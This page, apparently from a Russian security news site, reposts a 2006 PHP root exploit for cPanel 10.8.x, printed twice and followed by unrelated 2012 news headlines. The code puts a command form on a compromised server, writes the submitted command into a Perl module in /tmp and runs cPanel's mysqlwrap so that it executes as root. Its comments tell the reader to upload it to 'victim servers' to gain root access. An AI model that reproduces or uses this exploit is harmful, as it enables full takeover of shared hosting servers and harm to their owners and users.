cPanel_expl.php
14 октября, 2006
<!- for use old cpanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need have
<!- bash shell access on victim server but with this new exploit you only need
<!- to upload php file and run this into browser on victim servers.
<!- then you have root Access and you can do anything ....
<!- Coded by nima salehi ( nima@ashiyane.ir )
<!- Ashiyane Security Corporation www.Ashiyane.ir >
<title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title>
<center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"><br><br>
<?
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
echo "<br><br><br><br><br><b>Sorry Safe-mode Is On ( Script Not Work On This Server ) </b><br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
$disablef = @ini_get("disable_functions");
if (!empty($disablef))
{
$disablef = str_replace(" ","",$disablef);
$disablef = explode(",",$disablef);
if (in_array("passthru",$disablef))
{
echo "<br><br><br><br><br><b>Sorry Passthru Is Disable ( Script Not Work On This Server ) </b><br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
}
?>
<form method="POST" action="<?php echo $surl; ?>">
Command : <input type="text" name="c" size="40">
<input type="submit" value=" Run " name="B1"></form>
<textarea cols="60" rows="20" readonly>
<?php
$cmd=$_POST['c'];
if ( $cmd != "" )
{
$f=fopen("/tmp/strict.pm", "w");
fputs($f,'system("'.$cmd.'");');
fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
}
?>
</textarea>
<br>
Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
</center>
# milw0rm.com [2006-10-13]
<!- bash shell access on victim server but with this new exploit you only need
<!- to upload php file and run this into browser on victim servers.
<!- then you have root Access and you can do anything ....
<!- Coded by nima salehi ( nima@ashiyane.ir )
<!- Ashiyane Security Corporation www.Ashiyane.ir >
<title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title>
<center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"><br><br>
<?
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
echo "<br><br><br><br><br><b>Sorry Safe-mode Is On ( Script Not Work On This Server ) </b><br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
$disablef = @ini_get("disable_functions");
if (!empty($disablef))
{
$disablef = str_replace(" ","",$disablef);
$disablef = explode(",",$disablef);
if (in_array("passthru",$disablef))
{
echo "<br><br><br><br><br><b>Sorry Passthru Is Disable ( Script Not Work On This Server ) </b><br><br><br><br><br>";
echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
exit();
}
}
?>
<form method="POST" action="<?php echo $surl; ?>">
Command : <input type="text" name="c" size="40">
<input type="submit" value=" Run " name="B1"></form>
<textarea cols="60" rows="20" readonly>
<?php
$cmd=$_POST['c'];
if ( $cmd != "" )
{
$f=fopen("/tmp/strict.pm", "w");
fputs($f,'system("'.$cmd.'");');
fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
}
?>
</textarea>
<br>
Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
</center>
# milw0rm.com [2006-10-13]
03.02.2012
Вот такие вот новости. Пока без деталей.
03.02.2012
33-ий выпуск одного из самых качественных журналов в нашей отрасли уже доступен для скачивания тут.В ...
02.02.2012
Purple haze all in my brainLately things just don't seem the sameActin' funny, but I don' ...
02.02.2012
Информационные технологии вообще и Интернет в частности должны приводить ко спрямлению социально-эко ...
02.02.2012
Компании, желающие продвигатьсвои средства защиты информации (СЗИ), имеют возможность р ...
01.02.2012
На мой взгляд тестирование веб-приложений - одна из наиболее перспективных тем в области проведения ...
01.02.2012
Выражение «взято из открытых источников» или «из общедоступных источников» п ...
01.02.2012
Про универсальную электронную карту я уже писалне раз. И вот пару недель назад на сайте Минкомсвязи ...
01.02.2012
Вообще несмотря на отсутствие серьезных новостей в части законодательства по персданным, курс все ра ...
01.02.2012
Нет, это не статистика поисковых запросов настоящих элитный хакеров.Это Юра Гольцеврассказывает об у ...
01 февраля, 2012
Минздравсоцразвития намерено утвердить новый перечень должностей, на которых возможно прохождение альтернативной...
27 января, 2012
На время 100-дневного траура по политическому лидеру, в стране введен запрет на использование мобильных...
26 января, 2012
Корпорация оставляет за собой право хранить резервные копии удаленной пользователями информации
27 января, 2012
Как сообщил Навальный, из миллиона роликов, содержащих материалы НТВ, в телекомпании пожаловались только...
27 января, 2012
Взломщик учетной записи был приговорен к 160 часам обязательных работ и штрафу в размере 20 тыс. рублей.
27 января, 2012
Из-за действий злоумышленника из бюджета государства ежегодно пропадало по 2,5 миллиона гривен.
30 января, 2012
Злоумышленник взломал сервер игры «Call of Duty» и предлагал его администратору приобрести решение для...
01 февраля, 2012
В свободном доступе оказался архив с сообщениями, принятыми лидером молодежного движения «Наши».
26 января, 2012
Идентификация пользователя будет происходить с помощью комбинаций ментальных и поведенческих особенностей,...
01 февраля, 2012
Руководитель компании Rovio Entertainment заявил, что к пиратству не всегда стоит относиться категорично....
03 февраля, 2012
01 февраля, 2012
31 января, 2012
25 января, 2012

